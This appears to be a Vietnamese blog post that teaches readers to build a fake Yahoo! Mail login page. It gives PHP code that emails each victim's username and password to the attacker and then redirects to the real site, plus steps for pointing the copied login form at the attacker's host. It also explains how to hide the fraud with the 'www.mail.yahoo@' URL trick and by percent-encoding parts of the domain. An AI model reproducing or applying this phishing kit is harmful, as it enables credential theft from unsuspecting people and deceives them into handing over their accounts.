Tạo tệp yahoo.PHP, đoạn code như sau:
(?
$contactemail = "mailcuaban@yahoo.com"; //
$subject = "password of $login@yahoo.com : $passwd";
$message = "";
mail($contactemail, $subject, $message);
header("location: http://login.yahoo.com/config/login...&.src=ym&.last= &promo=&.intltype=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr= 0&.chkP=Y&.done=&login=$login&passwd=$passwd&.persistent=");
?)
Save as trang chính của yahoo! mail, sau đó mở tệp này bằng Notepate và tìm đến dòng:
(form name="login_form" onsubmit="return hash(this,'http://login.yahoo.com/config/login')" action="http://login.yahoo.com/config/login" method="post" autocomplete="off")
Thay đoạn này bằng :
(form name="login_form" onsubmit="return hash(this,'http://login.yahoo.com/config/login')" action="http://myhost/yahoo.php" method="post" autocomplete="off")
Cái này thì cực nhiều hướng dẫn trên diễn đàn rồi, nhưng có một số lỗi sau khiến hiệu quả không được cao:
1: Đoạn code sửa đổi hoạt động tốt, nhưng gây lỗi trên trang Fake login,
Nếu bạn để ý, làm theo hướng dẫn của bất kì bài viết nào hiện có trên 4um, trang fake login cũng hiện lên 1 biểu tượng báo lỗi (có dấu ! màu vàng) ở Status bar, nếu victim tinh ý 1 tí là nhận ra ngay, không cần nhìn lên đường link làm gì cả
Cách sửa: Thực ra cũng chẳng có gì đáng nói, các bro đó tiết kiệm quá nên bỏ qua mấy khai báo đơn giản
Chỉ cần sửa như sau:
Ổn rồi phải không, thành công 1 bước nhỏ trong việc che mắt victim........
2. Nhìn cái đường link của mấy Bro đó thấy chán cả người, ai lại giao diện của Yahoo! Mail mà tên đường dẫn lại cực chuối củ.. hehe.... No problem, thực tế thì chẳng ai đăng kí được 1 cái domain giông giống như mail.yahoo.com cả...... Cách khắc phục đây:
Nếu trước đường link, ta thêm "@", rồi oánh lia lịa các kí tự vớ vỉn, thì IE cũng chỉ công nhận các kí tự ở đằng sau "@" mà thôi
1 ý tưởng hay, do đó, bạn có thể thêm www.mail.yahoo@ vào đằng trước đường link của bạn,
VD: http://www.mail.yahoo@trang Web có hỗ trợ php/tên đăng kí của bạn
hehhe, thường là victim chỉ nhìn mấy cái chữ đầu của đường link mà thôi, do đó nhìn như vậy cũng tạm ổn phải không..... nếu chú nào dể tính thì uh, nhưng tôi thì không, đã làm là phải lừa không được 100% thì cũng phải 95-96% chứ, nhìn cái tên trang Web của bạn nó vẫn lù lù đằng sau kia kìa, ai mà chẳng nhận ra.....
Do đó, có 1 cách cực hay sau:
Mã hoá Url: Dùng cái này có thể mã hoá đường link của bạn thành các kí tự loằng ngoằng, khó ai dịch được (nhưng IE lại chấp nhận). điều đó sẽ khiến victim không đề phòng nổi do đường link trông hầu như hao hao với trang Yahoo! Mail khi ta Sign Out
Giới thiệu qua: Forum http://www.vnhacker.org/forum khi được mã hoá sẽ như sau: http://www.vn%68%61cke%72%2E%6Frg/f%6Fru%6D
Trông loằng ngoăng hợp lệ chưa??? Bạn thử copy đường link trên cho chạy thử xem sao???Đảm bảo dẫn đến forum..... hehheh
Và sau đây là bảng hướng dẫn mã hoá:
a ---> %61 b ---> %62 c ---> %63 d ---> %64 e ---> %65
A ---> %41 B ---> %42 C ---> %43 D ---> %44 E ---> %45
f ---> %66 g ---> %67 h ---> %68 i ---> %69 j ---> %6A
F ---> %46 G ---> %47 H ---> %48 I ---> %49 J ---> %4A
k ---> %6B l ---> %6C m ---> %6D n ---> %6E o ---> %6F
K ---> %4B L ---> %4C M ---> %4D N ---> %4E O ---> %4F
p ---> %70 q ---> %71 r ---> %72 s ---> %73 t ---> %74
P ---> %50 Q ---> %51 R ---> %52 S ---> %53 T ---> %54
u ---> %75 v ---> %76 w ---> %77 x ---> %78 y ---> %79
U ---> %55 V ---> %56 W ---> %57 X ---> %58 Y ---> %59
z ---> %7A
Z ---> %5A
1 ---> %31 2 ---> %32 3 ---> %33 4 ---> %34 5 ---> %35
6 ---> %36 7 ---> %37 8 ---> %38 9 ---> %39 0 ---> %30
. ---> %2E
Okie, được rồi đó, lưu ý như sau: đường link nào dù loằng ngoằng đến đâu thì cũng vẫn có các chữ và con số, do đó bạn không nên mã hoá tất cả, mà chỉ mã hoá 1 số từ nhạy cảm, ví dụ www11.brinkster.com chẳng hạn, để victim không nhận ra là brinkster, bạn mã hoá một số từ thôi:
w%77w1%31.br%69ks%74er%2Ecom
---- St -----
Video tham khảo:
No comments:
Post a Comment